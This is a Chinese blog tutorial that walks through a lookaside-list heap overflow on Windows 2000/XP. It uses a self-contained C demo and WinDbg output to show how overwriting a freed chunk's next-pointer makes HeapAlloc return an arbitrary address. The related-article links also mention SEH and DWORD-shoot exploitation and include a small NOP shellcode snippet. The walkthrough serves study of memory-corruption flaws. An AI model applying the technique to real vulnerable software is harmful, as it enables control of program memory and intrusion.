xp下调试堆溢出(下)--利用快表

最新推荐文章于 2021-04-14 18:31:10 发布
最新推荐文章于 2021-04-14 18:31:10 发布
阅读量874 收藏
点赞数
分类专栏: 溢出 调试 Exploit 文章标签: windows 调试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lixiangminghate/article/details/51854299
版权
调试 同时被 3 个专栏收录
122 篇文章 5 订阅
订阅专栏
Exploit
20 篇文章 1 订阅
订阅专栏
溢出
11 篇文章 0 订阅
订阅专栏

    前一篇<xp下调试堆溢出 (上)--HeapAlloc分配堆块>简单阐释了快表分配的原理,并在文章的结尾提到xp sp1以前的OS并不对分配出去的快表地址进行检查。本文简单演示利用这个漏洞。建议程序在win2k上以命令行运行

#include <stdio.h>
#include <windows.h>

int main(int argc,char* argv[])
{
	HLOCAL h1,h2,h3,h4;
	char* pi=NULL;
	HANDLE hp;
	char* str="1234";

	hp = HeapCreate(0,0,0);

	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
	h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8);
	HeapFree(hp,0,h4);
	HeapFree(hp,0,h3); //1)
	getchar();
	_asm int 3;
	HeapFree(hp,0,h2); //2)

	char* ptr = &(((char*)h1)[<span style="font-family: Arial, Helvetica, sans-serif;">strlen(argv[1])</span><span style="font-family: Arial, Helvetica, sans-serif;">]); //3)</span>
	strncpy((char*)h1,argv[1],strlen(argv[1]));
	memcpy(ptr,&str,4);
	h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); //4)
	h4 = HeapAlloc(hp,HEAP_GENERATE_EXCEPTIONS,8); //5)
	/
	printf("h4:%s\n",(char*)h4);
	getchar();
	return 0;
}
程序运行到1)处时一切正常,快表数组[1]中的堆块链表中有2项堆块: 

0:000> dd 3a0688 
...;003a1eb0:-->快表[1]指向的链表头
003a06e8  003a1eb0 00020002 01000004 00000004
003a06f8  00000004 00000002 00000000 00000000
0:000> dd 003a1eb0 L2 ;链表中第一个元素 这是h3释放的
003a1eb0  003a1ec0 00000000 ;链表的下一个元素地址是0x3a1ec0
0:000> dd 003a1ec0  L2 ;链表中第二个元素 这是h4释放的 
003a1ec0  00000000 00000000 ;链表下一个元素地址为空,链表结束
当运行到2)处,快表数组[1]中的链表就有3个元素。h1还没有释放,因此是合法可用内存,并且与被释放了的h2在内存空间上相差0x10B: 

0:000> dd 3a0688 ;以下省略0x3a0688-0x3a06e7之间跟程序无关的内存
003a06e8  003a1ea0 00030003 01000004 00000004
003a06f8  00000004 00000003 00000000 00000000

0:000> dd 003a1e90 ;003a1e90是h1指向的内存空间,h1有8字节可用空间;其后的 003a1e98是h2释放前的HEAP_ENTRY结构
003a1e90  00000000 00000000 00020002 000801c5
003a1ea0  003a1eb0 00000000 00020002 000801c3 ;003a1ea0是h2释放前的用户可用空间
0:000> dt _HEAP_ENTRY 003a1e90-8 ;003a1e90-8是h1的HEAP_ENTRY结构
ntdll!_HEAP_ENTRY
   +0x000 Size             : 2 ;Size表明当前堆块的大小为2*8B=0x10B
   +0x002 PreviousSize     : 0x301
   +0x000 SubSegmentCode   : 0x03010002 Void
   +0x004 SmallTagIndex    : 0xc7 ''
   +0x005 Flags            : 0x1 ''
   +0x006 UnusedBytes      : 0x8 ''
   +0x007 SegmentIndex     : 0 ''
0:000> dt _HEAP_ENTRY 003a1ea0-8 ;003a1e90-8是h2的HEAP_ENTRY结构
ntdll!_HEAP_ENTRY
   +0x000 Size             : 2
   +0x002 PreviousSize     : 2
   +0x000 SubSegmentCode   : 0x00020002 Void
   +0x004 SmallTagIndex    : 0xc5 ''
   +0x005 Flags            : 0x1 ''
   +0x006 UnusedBytes      : 0x8 ''
   +0x007 SegmentIndex     : 0 ''
如果这时不加节制的操作h1,让他发生溢出,那么他将覆盖h2的_HEAP_ENTRY甚至会覆盖到h2的用户空间部分(内存地址0x3a1ea0)(虽然已经被释放);这个用户空间部分目前记录着单链表的下一个元素的地址,它的作用是当程序后续调用调用HeapAlloc,把记录的地址返回给调用者 

0:000> dd 003a1ea0 L2
003a1ea0  003a1eb0 00000000 ;<span style="font-family: Arial, Helvetica, sans-serif;">0x3a1eb0--</span><span style="font-family: Arial, Helvetica, sans-serif;">这是1)处调用FreeHeap(h3)时释放的堆块</span>

机会来了就得利用起来,既然没有检测机制能检测到发生覆盖,那就大肆溢出:先覆盖h2的HEAP_ENTRY部分,最终覆盖h2用户可用部分,以此篡改单链表记录的下一个元素的地址。为了达到这个目的,首先要合法的使用完h1自身合法的大小为0x8B的用户空间,然后再非法使用h2的大小为0x8B的HEAP_ENTRY空间,最终往h2的用户空间部分写入4字节地址。在我的演示程序中这个地址为变量str的地址,指向一串字符串。

3)处,接受命令行输入拷贝到h1处,同时在h1的末尾处追加str的地址。这样只要输入的命令行参数长度超过4就会发生溢出,如果输入长度正好等于8,则恰好用str的地址覆盖
快表数组[1]指向的链表,如我的输入及对快表造成的影响:


0:000> dd 3a0688 ;查看快表
003a06e8  003a1ea0 00030003 01000004 00000004 ;单链表的下一个元素正常还是h2
003a06f8  00000004 00000003 00000000 00000000
0:000> dd 003a1ea0 l2 ;但由于h2的用户空间被覆盖,导致原来保存的内容被篡改,链表的下一个元素不再是0x3a1eb0
003a1ea0  00406038 00000000
0:000> dc 00406038 
00406038  34333231 00000000 00406e01 00000001  1234.....n@.....
因此只要经过2次HeapAlloc操作(第一次从快表中获得0x3a1ea0,第二次从快表中获得错误地址),就会使HeapAlloc返回错误的地址,对于这个程序,就是第六次调用HeapAlloc时触发: 

0:000> p ;第5次申请内存
004010af ffd3            call    ebx {ntdll!RtlAllocateHeap (7c9300a4)}
0:000> p
0:000> r eax
eax=003a1ea0 

0:000> p ;第6次申请内存
004010b6 ffd3            call    ebx {ntdll!RtlAllocateHeap (7c9300a4)}
0:000> p
004010b8 50              push    eax
0:000> r eax ;eax承载返回给调用者的返回值
eax=00406038
这里需要注意一点:第六次调用HeapAlloc时的参数 

h4 = HeapAlloc(hp,HEAP_GENERATE_EXCEPTIONS,8);
意味仅分配空间,但不要清零,否则虽然返回给h4的地址是指向str字符串的地址,但这段内容被系统清空了,因此printf不会有输出(我调试了很久才发现)

在往下执行就能输出h4的值了,如果是在win2k下,能看到输出了1234~


Eugene800
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第5章 溢出利用_快表结构分析
yellow的博客
05-12 510
块表结构分析
利用快表lookaside进行对溢出
weixin_30843605的博客
03-28 107
块表 也就是 lookaside表!!!!!! 这种方法 很难 条件: 1 memcpy 赋值 2 使用块表 有HeapAlloc 和 HeapFree后还有赋值等 3 两次 赋值 总的来说 这个知识点很重要 XP 下还可以 先构造如下: 后面发现 将 SEH handler 设置为 0x0012ffe4 更好些!!!!!!!!!!...
xp溢出DWORD SHOOT---狙击空闲表
lixiangminghate的专栏
08-23 1492
前面写过通过溢出利用快表,这次我的目标是利用空闲表。千万不要觉得这是炒作话题,利用空闲表比利用快表要复杂很多,因此希望读者不要弃篇。     行文开始前,我想对0day安全:软件漏洞的作者提到的DWORD Shoot的环境做一些补充说明:作者说实验应在w2k下完成,在xp sp3下会失败。这是因为作者DWORD SHOOT的目标是PEB!RtlEnterCriticalSection函数地址,
溢出(三)快表DWORD SHOOT
Reshahar 的博客
03-20 1338
Windows 溢之快表DWORD SHOOT By Rweb@Reshahar 0x000 环境 1. 虚拟机 VirtualBox 5.0.20 2. 系统 windows 2000 Kali linux 3. 工具 VC++6.0 OllyDbg 1.10 汉化版 AsmToE v5.20 0x001溢出
xp调试溢出(上)--HeapAlloc分配
lixiangminghate的专栏
07-06 1741
题记:win10都开始推广了,我还在折腾xp,真low,不过总得有这个过程吧。     DWORD SHOOT的原理是利用Release版发布的程序在正常启动(非调试启动)情况下,使用Lookaside表(又称块表)管理程序中频繁的申请/释放操作。本文以溢出学习笔记和为基础,改进而来。     首先要明确Lookaside表是一个单链表
XP SP3研究
Niklaus_Lee的博客
02-22 929
本文原创作者:icq5f7a075d,本文属i春秋原创奖励计划,未经许可禁止转载!https://bbs.ichunqiu.com/thread-33885-1-1.html本文如果出现错误,欢迎指出,感激不尽!本文中的所有程序请在虚拟机中运行。前言溢出漏洞是一种常见的软件漏洞,但是的结构比较复杂,不同版本操作系统结构存在较大差异,网络上关于的介绍也存在名词不统一的情况,这都极大的增加了...
Windows平台下的溢出利用技术
02-26
开头我讨论了在旧版本Windows利用溢出的技术,试着给读者提供一些关于unlink过程是怎样执行的、以及freelist[n]里面的flink/blink是如何被攻击者控制并提供简单的任意“4字节写”操作的实用的知识。本文的主要...
73-看门狗溢出测试(51单片机C语言实例Proteus仿真和代码)
06-15
73-看门狗溢出测试(51单片机C语言实例Proteus仿真和代码)73-看门狗溢出测试(51单片机C语言实例Proteus仿真和代码)73-看门狗溢出测试(51单片机C语言实例Proteus仿真和代码)73-看门狗溢出测试(51单片机C语言实例...
总结windows溢出的三种利用方式.rar_win32 汇编_溢出_溢出
最新发布
09-14
溢出还可以利用的碎片化特性。当上有很多小的空闲块时,分配大块内存可能导致碎片。攻击者可以通过精心设计的溢出,使得系统在回收内存时产生错误的空洞,进而可能在特定位置插入恶意代码。然后,通过触发特定...
XP-442清零软件 图解.rar
02-02
EPSON XP-442打印机是一款家用型多功能一体机,集打印、扫描和复印功能于一身,深受用户喜爱。然而,随着打印量的增加,打印机内部的废墨垫会积累到一定程度,导致打印机提示需要进行清零操作。这就是所谓的"废墨垫...
溢出(一)结构
Reshahar 的博客
03-09 6621
0x000 环境 虚拟机 VirtualBox 5.0.20 系统 windows 2000 工具 VC++6.0 OllyDbg 1.10 汉化版 0x001 中的数据结构 块 1) 块分为块首和块身 2) 块首大小为(8字节) 注:flag 01 表示块占用 3) 空闲态的块在块首后有两个指针 表(空表和快表) 1) 空表:双
漏洞学习笔记——溢出原理
谈成(C/C++)
04-14 3642
最近在学习溢出原理,但是查了网上和书上的一些讲解,总是感觉缺少一些关键点。所以理解起来总是有点晕,经过努力的调试分析后,总结了下面的更为详细的溢出原理。如果不准确的地方,希望大佬可以提醒一哈~ 1.的结构: struct _LIST_ENTRY{ DWORD Flink; DWORD Blink; } //空闲头结构 struct _HEAP_FREE_ENTRY{ union{ struct{ union{ struct { WORD Size;
总结windows溢出的三种利用方式
老裴
12-11 1268
1.利用RtlAllocHeap 这是ISNO提到的,看这个例子 main (int argc, char *argv[]) {  char *buf1, *buf2;  char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/x03/x00/x05/x00/x00/x01/x08/x00/x11/x11/x11/x11/x21/x21/x21/x21";  bu
演示Heap Spray(喷射)的原理
热门推荐
lixiangminghate的专栏
12-01 1万+
Heap Spray原理浅析 这篇文章应该是网上阐释喷原理最为详尽和易懂的一篇。唯一让我感到遗憾的是:文章结尾处给出的例子是基于javascript的,这对于我这种门外汉来说并不是一个很好的练功房。结合自己对文章的理解,在这给出c++版本的喷射演示代码。 #include #include class base { char m_buf[8]; public: int setBuf
关于 [栈溢出后jmp esp执行shellcode] 原理分析
lixiangminghate的专栏
11-25 6215
网上关于栈溢出后用jmp esp执行shellcode的文章有很多,感觉分析的都没有戳到点,所以想结合自己调试的经历写下自己的想法。 正常情况下,函数栈分布图如下:---->栈内存由低向高方向-----> |------------栈变量----------|----ebp----|------返回地址------|函数形参| 发生溢出后,以上栈空间的内容被覆盖,可能从上面的布局变成这样:
溢出利用SEH异常处理
lixiangminghate的专栏
11-25 2212
前面一篇blog 里提到了基于溢出利用SEH的方式,本文将侧重于栈溢出利用SEH异常处理。     先来看下示例代码: #include #include char shellcode[] = {"\x90\x90\x90\x90\x90\x90\xeb\x10" \ "\x90\x90\x90\x90\x90\x90\x90\xcc" \ "\x90\x90
溢出(DwordShoot)利用SEH异常处理
lixiangminghate的专栏
11-25 1704
异常处理的身影处处可见,最常见的处理方式就是当异常发生时,在异常处理模块中记录日志,便于程序员事后定位。但是,被异常处理包含的代码真的会在异常发生时让程序优雅的退出吗?在程序的世界里什么都可能发生,所以,可以说前面那个问题的答案是否定的。这正是本文的主题:利用SEH异常处理。     SEH溢出有多种方式:栈溢出溢出。本文关注溢出后如何利用SEH。溢出的步骤和前文一样:从FreeList
<Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节注记(下)
lixiangminghate的专栏
03-01 1182
在前一篇一节注记(上) 的末尾部分,我们遇到访问无效内存的异常,本篇将讨论如何解决这个异常并关闭DEP保护。我们已经知道引起异常的原因是向无效地址[ebp-4](0x9090908C)写入数据。要解决这个异常可能有2种思路:1.让[ebp-4]指向可读写的地址;2.修改函数LdrpCheckNxCompatibility的实现,当然,这种方法不是本篇讨论的内容,是否具有可行性也没有验证过,所以,还
<Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节补充
lixiangminghate的专栏
03-08 899
本文补充记录我在试验关闭DEP过程遇到的问题和解决方法。     首先要说一下用OllyFindAddr插件寻找目标指令时可能会遇到的问题。诚然这个插件是个好东西,能迅速列出需要的指令流的地址,但并不是所有在列的指令地址都可以使用,挑选前需要甄别。以关闭DEP保护流程中抬高esp值"Find Pop Retn+n"为例: 插件罗列了一备选指令地址,我挑选最后一个地址"0x7D97FE
Windows XP/2003溢出详解:实战与利用策略
本文档深入探讨了Windows XP/2003操作系统中的管理原理及其在溢出利用攻击中的应用。首先,文章从系统架构和管理机制入手,介绍了前端管理器与核心层管理器,它们分别是Windows内存分配的前端控制和后端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值